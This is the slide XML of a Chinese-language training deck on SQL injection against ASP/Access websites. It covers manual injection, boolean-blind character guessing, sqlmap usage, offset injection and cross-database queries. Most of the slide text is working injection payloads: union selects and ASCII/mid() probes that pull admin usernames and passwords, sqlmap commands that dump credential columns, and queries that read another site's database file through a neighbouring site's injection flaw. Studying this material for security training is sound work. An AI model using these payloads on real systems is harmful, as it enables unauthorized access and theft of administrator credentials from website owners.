            </a:endParaRPr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判断数据库表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A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and exists (select * from admin)</a:t>
            </a:r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判断数据库列名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A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and exists (select admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/username/password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> from admin)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断字段长度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二分法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>order by 20</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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联合查询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zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and 1=2 union select 1,2,3,4,5,6,7,8,9 from admin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数据库联合查询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and 1=2 union select 1,2,admin,4,password,6,7,8,9 from admin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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逐字猜解法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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断账户密码的长度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and (select len(admin) from admin)=5  如果返回正常说明管理员账户的长度为5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and (select len(password) from admin)=5  猜解管理密码长度是否为5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一般密码长度为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位、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>位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acess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库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22" y="87630"/>
            <a:ext cx="10875478" cy="585470"/>
          </a:xfrm>
        </p:spPr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逐字猜列中的数据 猜解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注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22" y="757990"/>
            <a:ext cx="11777846" cy="5871410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>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>猜解管理员表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(admin)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admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列的第一个字符 前提</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列已经拆解出来了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码来判断</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and (select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(mid(admin,1,1)) from admin)&gt;100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>返回正常说明大于，不正常说明不大于</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and (select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(mid(admin,1,1)) from admin)&gt;50  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>返回正常说明大于</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and (select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(mid(admin,1,1)) from admin)=97  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>返回正常说明等于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>97 97</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对应的字母为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a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zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   猜解管理员表的第一列的第二字符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>and (select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(mid(admin,2,1)) from admin)=100  d</a:t>
            </a:r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猜解管理员表的第一列的第三字符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>and (select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(mid(admin,3,1)) from admin)=109</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>and (select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(mid(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>,2,1)) from admin)=97</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>以此类推</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>猜解管理员表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(admin)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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列的第一个字符 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and (select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(mid(password,1,1)) from admin)=50 2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3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ACCESS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入工具使用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阿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、明小子、穿山甲、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>havji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等工具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85" y="87630"/>
            <a:ext cx="5946775" cy="585470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具简单使用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984" y="782053"/>
            <a:ext cx="11842016" cy="6075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判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是否存在注入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>sqlmap.py -u "http://192.168.149.130:81/about.asp?id=2"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acess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>不用指定数据库可以直接猜表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爆表名称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sqlmap.py -u "http://192.168.149.130:81/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>about.asp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=2" –tables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爆列名称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sqlmap.py -u "http://192.168.149.130:81/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>about.asp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=2" -T admin --columns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爆列内容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sqlmap.py -u "http://192.168.149.130:81/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>about.asp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=2" -T admin -C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>admin,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> --dump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可以在里面执行对应的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命令，例如创建用户、添加到管理员组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4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ACCESS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>偏移注入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590925" cy="6899910"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="5561351" cy="6899639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5561351" cy="6858002"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a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20000" contrast="-40000"/>
                        </a14:imgEffect>
                        <a14:imgEffect>
                          <a14:saturation sat="2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r="-119980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-1"/>
              <a:ext cx="5561351" cy="6899639"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="157E9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1855" y="887730"/>
            <a:ext cx="16605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Levenim MT" panose="02010502060101010101" pitchFamily="2" charset="-79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Levenim MT" panose="02010502060101010101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7150" y="174498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注入漏洞形成原理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6590" y="18472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077585" y="22047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9850" y="2481580"/>
            <a:ext cx="3398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ACCESS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手工注入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9290" y="25838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altLang="zh-CN" sz="2000" b="1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90285" y="29413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29375" y="3215005"/>
            <a:ext cx="3388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ACCESS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注入工具使用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8815" y="33172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altLang="zh-CN" sz="2000" b="1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6099810" y="36747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42075" y="3951605"/>
            <a:ext cx="345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ACCESS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偏移注入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71515" y="40538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altLang="zh-CN" sz="2000" b="1" dirty="0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112510" y="44113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77" y="0"/>
            <a:ext cx="11489088" cy="937795"/>
          </a:xfrm>
        </p:spPr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偏移注入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</a:rPr>
              <a:t>当我们猜出了表名但是猜不出字段名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67" y="937795"/>
            <a:ext cx="11085797" cy="5294563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参考链接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:https://www.cnblogs.com/xishaonian/p/6054320.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err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Eg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我们通过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order by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已经猜出了有几列，但是始终猜不出列名称，我么就需要使用偏移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注入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 dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代替字段长度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>用*号来从最后一个字段数22向前逐个删除来代替，直到显示正常为止，* 代表了所有admin表的字段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r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>http://127.0.0.1:99/0/Production/PRODUCT_DETAIL.asp?id=1142 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>http://127.0.0.1:99/0/Production/PRODUCT_DETAIL.asp?id=1142 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>http://127.0.0.1:99/0/Production/PRODUCT_DETAIL.asp?id=1142 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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33" y="120317"/>
            <a:ext cx="11290332" cy="61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Eg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192.168.149.130:85/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>show.asp?pkid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=482 order by 38  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>得到字段长度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http://192.168.149.130:85/show.asp?pkid=4820 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,*from admin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http://192.168.149.130:85/show.asp?pkid=4820%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,*from%20admin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/>
              <a:t>http://192.168.149.130:85/show.asp?pkid=4820%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,*%20from%20(admin%20as%20a%20inner%20join%20admin%20as%20b%20on%20a.id=b.id)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22-16=6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10+6*2=22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4+6*3=22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union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)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union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)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3536"/>
            <a:ext cx="3075774" cy="4207859"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>第二种方法：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>1.后台登陆文件源码 表单里面的参数值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>2.看网站地址链接上的规则</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>3.是否判断出对方使用的cms程序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78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6364" y="2166919"/>
            <a:ext cx="6672263" cy="3662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25" y="159820"/>
            <a:ext cx="11437186" cy="585470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>垮裤查询  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一定是同一套</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cms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表名、列名一样的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137" y="1106906"/>
            <a:ext cx="11598442" cy="46160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000" dirty="0"/>
              <a:t>垮裤查询 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>前提有读取权限 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>	已经得到了数据库物理路径	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>C:\web\shop7z\data\#shop7z.asp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	iis7.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>但是即使你找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的具体路径 也不允许你下载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>很有可能会把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>后缀改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>或者其他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情景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我们攻击的服务器上面有多个站点，但是我们获得了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>站的数据库物理路径	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>C:\web\asp\xydata\xycms.mdb –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>别的站点的数据文件地址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我可通过其他站点存在的注入漏洞进行跨库查询  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>感觉像是旁站攻击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http://192.168.149.130:84/common.asp?id=16 union select 1,password,admin,4 from [C:\web\asp\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>xydata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\xycms.mdb].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>admin_user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59" y="219977"/>
            <a:ext cx="5946775" cy="585470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>垮裤查询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137" y="1106906"/>
            <a:ext cx="10743498" cy="461603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zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>条件:同服务器下的站点有注入,知道对方站的数据库绝对路径，知道对方数据库表，表中的字段名可以用这个方法来跨库查询.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>绝对路径： （D:/wwwroot/....*.mdb .asa .asp）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>例如</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>a是目标站点 b是存在注入的站点 a,b是同服务器的站点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>admin为数据库中的表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>user为数据库中admin表的段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
